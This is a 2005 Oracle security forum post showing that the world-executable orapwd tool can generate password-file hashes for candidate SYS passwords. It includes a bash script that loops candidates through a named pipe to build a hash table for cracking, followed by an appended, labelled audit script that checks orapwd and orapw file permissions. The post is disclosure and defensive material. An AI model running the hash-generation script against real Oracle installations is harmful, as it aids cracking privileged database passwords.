Pete Finnigan's Oracle Security Forum (http://www.petefinnigan.com/forum/yabb/YaBB.cgi)
(Message started by: Pete Finnigan on Sep 20th, 2005, 1:51pm)

Title: orapwd to crack sys hash?
Post by Pete Finnigan on Sep 20th, 2005, 1:51pm
Hi,

I've been playing with orapwd. Orapwd is 'world' executable on a standard Oracle installation. It allows you to change/set the SYS password. The password is stored in $ORACLE_HOME/dbs/orapw<SID>.
But any OS user can execute it and create his own password-file. If the password-file doesn't exist it's created; if it exists you get an error: OPW-00005: File with same name exists. If you use the force=y option the password-file is recreated. How can you use orapwd to crack SYS's password? Well, if you happen to have the hash value of SYS's password (very improbable, I think) you could generate all possible hashes with orapwd (although probably not as fast as orabf; I did a test with 26 passwords, from A to Z, and it took 0.6 seconds):

#!/bin/bash

# Author: I.A. Saez Scheihing

mknod pijp p

while true; do cat < pijp  >> output.txt; done &

orapwd file=pijp password=a force=y
orapwd file=pijp password=b force=y
orapwd file=pijp password=c force=y
orapwd file=pijp password=d force=y
orapwd file=pijp password=e force=y
orapwd file=pijp password=f force=y
orapwd file=pijp password=g force=y
orapwd file=pijp password=h force=y
orapwd file=pijp password=j force=y
orapwd file=pijp password=k force=y
orapwd file=pijp password=l force=y
orapwd file=pijp password=m force=y
orapwd file=pijp password=n force=y
orapwd file=pijp password=o force=y
orapwd file=pijp password=p force=y
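# ...
# (one orapwd line per remaining candidate password)
kill $!   # stop the background reader loop before removing the pipe
rm pijp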

# end script

So after 'password=' you could try all password combinations. After completion you would find all possible hashes in file output.txt!


By the way:
I don't think everyone should be allowed to execute orapwd. This tool is meant for oracle only.

kind regards,

Ivan
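
A check for the concern raised at the end of the post, as an added example that is not part of the original post: it reports whether orapwd can be run by every OS user and whether any orapw<SID> file is accessible to users outside the owner and group. The function names and the bin/ location of the tool are assumptions of this example.

```bash
#!/bin/bash
# Added example (not from the original post): audit orapwd and password-file modes.
# Assumed layout: <ORACLE_HOME>/bin/orapwd and <ORACLE_HOME>/dbs/orapw<SID>.

# Print a file's permission bits in octal (GNU stat, then BSD stat as fallback).
file_mode() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# audit_orapwd <oracle_home>
# Prints one FINDING line per problem; returns 0 when clean, 1 otherwise.
audit_orapwd() {
    local home tool mode f findings
    home="$1"
    tool="$home/bin/orapwd"
    findings=0

    if [ -f "$tool" ]; then
        mode=$(file_mode "$tool")
        # Lowest bit of the "other" digit is execute: any OS user can run the tool.
        if [ $(( 0$mode & 01 )) -ne 0 ]; then
            echo "FINDING: $tool (mode $mode) is executable by every OS user"
            findings=$((findings + 1))
        fi
    else
        echo "NOTE: $tool not found; check the ORACLE_HOME argument" >&2
    fi

    for f in "$home"/dbs/orapw*; do
        [ -f "$f" ] || continue   # unmatched glob or not a regular file
        mode=$(file_mode "$f")
        # The file holds the SYS password hash: "other" needs no access at all.
        if [ $(( 0$mode & 07 )) -ne 0 ]; then
            echo "FINDING: $f (mode $mode) is accessible to every OS user"
            findings=$((findings + 1))
        fi
    done

    [ "$findings" -eq 0 ]
}

# Run against the live installation only when ORACLE_HOME is set.
if [ -n "${ORACLE_HOME:-}" ]; then
    audit_orapwd "$ORACLE_HOME" || echo "review the findings above" >&2
fi
```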


